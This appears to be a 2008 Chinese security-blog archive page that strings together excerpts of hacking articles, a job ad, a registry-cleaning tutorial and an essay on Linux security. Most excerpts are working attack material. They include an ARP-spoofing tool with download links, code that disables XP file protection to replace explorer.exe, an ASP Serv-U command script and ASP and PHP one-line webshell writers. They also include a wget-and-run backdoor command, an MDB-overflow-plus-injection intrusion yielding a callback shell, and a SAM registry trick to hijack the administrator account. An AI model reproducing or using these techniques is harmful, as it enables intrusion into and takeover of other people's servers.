帮朋友发个AD。
岗位要求如下:1,熟悉程序安全测试,有丰富web渗透测试经验优先熟悉web程序安全审计,程序漏洞挖掘2、熟悉网络安全行业的专业知识,了解相关安全产品(如防火墙、入侵检测、漏洞扫描、身份认证等);3、熟悉TCP/IP协议,了解路由和交换技术,了解IP网络;
待遇:月工资8k以上。工作地点:北京 or 深圳,有意者请发简历到:neeaocn【AT】gmail.com
如果你有即时通讯工具可以联系到我的话,也可以直接M我!
Archive for 一月, 2008
作者:breach来源:breach-一个奇妙的名字
Skiller在Ph4nt0m | Google 网上论坛发布了一个号称可以过任何arp防火墙的测试软件。http://groups.google.com/group/ph4nt0m/browse_thread/thread/62ef34de7d39d14b软件说明:首先这是一个演示版本,与完全版本的唯一不同是不具备流量探测功能,因为网络中如果存在多个这样东西造成网络混乱是难免的,所以在发行上会做一些限制。无arp的sniffer可在有arp防火墙,双向绑定环境下有效控制对方流量完全隐藏,过任何arp防火墙。需要.net支持,管理员权限运行。不支持无线网卡使用方法:设置网卡,ip,攻击强度手动添加或自动扫描主机到主机列表勾上一个主机,开始吧。演示动画地址:http://www.cncert.net/labs/Skiller.swf软件下载地址:http://www.cncert.net/labs/Skiller.rarcncert….@gmail.com,cncert….@gmail.com2008-01-10测试环境:几台XP SP2系统的机器,一台windows 2003的机器(就是我的机器,呵),抓包工具:Sniffer Portable 4.7.5测试下,这个测试软件的确可以突破360AntiARP 等一切在客户端安装的防ARP攻击防火墙,后面将有具体分析,各位看下就知道我为什么会这么说了。这个测试软件说到底就是直接发欺骗包给网关(这里假设为A),直接欺骗网关,对于要攻击的另一方(这里假设为B),它根本就没有任何动作,这样就会导致在机器B上安装的任何防ARP攻击防火墙,无论多底层过滤都没有任何用处。具体地说就是假如攻击者C对B进行这种方式上的ARP攻击,在机器B上安装的任何防 ARP攻击防火墙将没有任何反映,虽然它还是很努力地监视着从网络里过来的数据包,但它这个时候还是以为社会还是很太平的,因为它根本就不知道在同一个网络里有另外一个很邪恶的家伙正在攻击它的主人,真是杀人于无形之中。。。。从上图以及我的一些测试结果,我可以告诉大家,它无非就是假冒被攻击方B的IP以及MAC地址,以一定频率直接发送很小的包去欺骗网关,具体表现为:假冒被攻击方B的IP以及MAC地址,以每一侦60 bytes(跟网关的arp广播数据包一样大)的数据直接发给网关,发送频率就是软件上提到的强度设置,如果你设置强度是20的话,那么它将自动以 0.05秒的频率自动发送18 bytes 的UDP数据(内容是02 10 21 00 a9 5a c0…
作者:open来源:open's blog
在偶的VPC上测试是可以的。没有更多的测试.偶并没有调用dllcache目录下的.你喜欢吧{*******************************************************}{ }{ 关闭XP保护。替换explorer.exe }{ }{ 版权所有 (C) 2008 bbs.secdst.net }{ }{*******************************************************}
program Project1;
uses Windows,TlHelp32;
function LowerCase(const S: string): string; //转小写var Ch:…
Author:落叶纷飞来源:http://www.cnsst.org/使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP<%@ LANGUAGE = VBScript %><%Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quitdim actionaction=request("action")if not isnumeric(action)…
来源:WEB安全手册|Trace's Space
<%set xmldoc = Server.CreateObject("Msxml2.DOMDocument.3.0")xmldoc.loadXml("<p></p>")xmldoc.documentElement.appendChild xmldoc.createComment("<"+"% execute(request(chr(35))) %"+ ">")xmldoc.save(server.mappath("sample.asp"))Response.Redirect "sample.asp"%>
转载请保留版权标记,谢谢——————————-by 大蝉@http://blog.gsnsg.com/weblog/usual/ QQ:271607603——————————————
今天入侵了一个ACCESS的站,思考了一些问题,记性不好,怕忘了,记录一下:
这个站设置很变态,什么都没有,连FSO都删了,好不容易找到一个宝贵的注入,点几经周折进了后台,看到可以更改上传类型,大喜,可是怎么改也改不了,最后发现上传类型记录在config.asp里,没FSO根本改不了,Faint…..
我只能围绕这个唯一的注入点展开思考,如果是SQL那该多好,如果是SA权限那该多好,艾, YY是没用的,我还是被ACCESS少得可怜的功能阻挡住了
我望着上传类型发呆,GIF JPG RAR MDB ,Wait,看到了MDB 我突然想起来几年前曾经流行的MDB溢出,在MDB数据库里面加入溢出代码,只要打开数据库就执行溢出代码
我可以上传个溢出MDB,可是上传了并没有用,如何让溢出代码真正执行呢?
看到后台的网站绝对路径,我立刻想到了跨库,HaHa,只要上传一个有问题的数据库,然后利用跨库查询,溢出就实现了,这个理论上是成立的,Have a try
制作溢出MDB,指定了Callback IP和Port,上传,
Select Count(*) from [D:\新版网站\UploadFiles\20077181931188.MDB].testHoHo本地监听顺利出现了Shell,哈哈,溢出成功,虽然溢出的得到的 SHELL只有 GUEST权限,不过还是很开心,可以ECHO小马,可以用Serv-u提权,还是很不错的
总结一下,MDB溢出+跨库 得Shell的方法必须要有的条件:
1.要有网站绝对路径
2,要有上传点,随便什么格式都行 (后来发现即使不是MDB后缀,只要格式正确都能够用跨库连接)
3.当然,还要有注入点
就这些条件,比起曾经被炒得很火的out into导出shell条件不算很苛刻吧
还有一些心得,也写下来:
1.网上有些人说跨库只能用Union查询,其实不然,我用的是
city=1…
文章作者:pt007[at]vip.sina.com信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。
LINUX下写入一句话木马的方法整理:(1)echo '<?eval($cmd);?>' > /home/web/www/PREFIX/htdocs/mu.php(2)echo "<?fputs(fopen('1.php','w+'),'<?eval($_POST[c]);?>');?>" >test11.php(3)"system('wget http://xxxxxx.com/backdoor -P /tmp')"//wget的-P选项 指定保存的目录的,下载完你可以ls /tmp看下,一般有两个目录肯定可写的/tmp /usr/tmp推荐写/usr/tmp目录,下载好了,chmod +x backdoor 一下,然后执行一下,当然如果是c写的,需要事先编译一下。
来源:红狼
sa默认可以读sam键.应该。reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.regnet user administrator test用administrator登陆.用完机器后reg import c:\test.reg根本不用克隆.找到对应的sid.
作者:灰狐来源:灰狐's Blog
注:本文已发表在<黑客防线>2008年第1期,转载请注明出处.
在第11期的《黑客防线》中,我那篇关于algsrvs病毒专杀的文章中有点不太完美的地方,就是没有把清理注册表那一部分写完整,一个原因就是我在那里说的因为当时我已经把病毒清理干净了,没有记录下每一个相应键值的位置;还有一个原因就是就算我记录下来了,也是一件相当麻烦的事情,因为病毒在注册表中写入的信息相当地多,大概有几十处,这样一个一个删还不把人累死?
当然也不是没有办法,我今天就用一种比较简单的思路来进行演示:首先完整枚举所有项,检查其键值是否被病毒修改过,然后进入子项中递归调用此函数完成遍历注册表的功能。
为了程序的通用性,今天我就不用VCL库中的Registry类了,改用Windows操作系统提供的正宗API,这样大家就可以把它完美地嵌入到自己的程序中了。
首先来讲一点基础知识,使没有编程操作过注册表的菜友们也能顺利上手。
注册表有五大子键,这我就不废话了,今天我们只拿其中比较重要的一个HKEY_LOCAL_MACHINE来演示,需要遍历注册表的话只需要把函数简单修改下调用五次就没问题咯。我们在注册表中某个地方点击右键,选择“新建”,可以看到有以下几种数据类型:字符串值、二进制值、DWORD值、多字符串值、可扩充字符串值。最常用的也是注册表中子项的默认值就是字符串值,它的内部名称为REG_SZ。
关于注册表编程的资料通常都很零散,所以通常我们最好的参考书就是MSDN了,在MSDN的索引里输入Reg就可以显示出所有以Reg开头的函数,前面那些基本就是跟操作注册表有关的, RegOpenKeyEx,RegCloseKey,RegDeleteValue、RegEnumKeyEx、RegEnumValue、 RegQueryValueEx、RegSetValueEx这几个是我们重点需要的。
首先我们来看一下删除病毒键值的方法,为避免误删除,我们先自己建立一个子项:HKEY_LOCAL_MACHINE\SOFTWARE\grayfox,选中它后在右边的空白区域点右键,“新建”—— “字符串值”——“test”,双击“test”,在“数值数据”里输入“test1,test2,test3”。我们假设test是启动项, test1、test2是本来的启动程序,病毒又向其中添加了一个test3,我们的目的就是把使其还原为test1,test2。这里要注意的是我们是不能直接使用RegDeleteKey将其删除的,如果里面只有test3这个值的话是可以的,但如果还有其他值的话需要使用RegSetValueEx 重新设置。
现在我们来使用VC 6.0建立一个控制台程序测试效果,代码如下:
#include <stdio.h>
#include <windows.h>
void main()
{
HKEY hKey = NULL;
DWORD rc;
rc=::RegOpenKeyEx(HKEY_LOCAL_MACHINE,"software\\grayfox",0,
KEY_ALL_ACCESS,&hKey);
if( rc == ERROR_SUCCESS )
{
unsigned char…
很多人都知道Linux系统的安全性比微软Windows系统更高。但是,为什么会是这样?这种说法到底有没有道理?却很少有人能回答得出来。
为了搞清楚这个问题,首先,我们必须要明确“安全性”的定义。其实,绝大多数人都犯了同样一个错误,那就是孤立地认为某个产品比较安全。比如,Linux 系统要比微软Windows系统更加安全;或是,开放源代码的Firefox网络浏览器要比微软IE浏览器更加安全。不、不、不,你们都错了,安全性并不是针对某个产品本身而言的。它是一整套以用户为核心的体系。安全性指的是在用户和软件之间,通过适当的交互方式,所达成的一种活跃状态。漏洞补丁管理仅仅是这套系统的一个重要方面。而其它可能更为重要的方面还包括:用于补丁管理的恰当工具、健壮的默认设置,达成安全的多层次运作体系,以及时刻将用户看作是安全性的第 一道、也是最后一道防线的设计理念。
当你有了这种思想之后,我就可以向你解释,为什么在一般情况下,一位有经验的用户在使用Linux系统要比使用Windows系统要更加安全:
1. 更加卓越的补丁管理工具:
…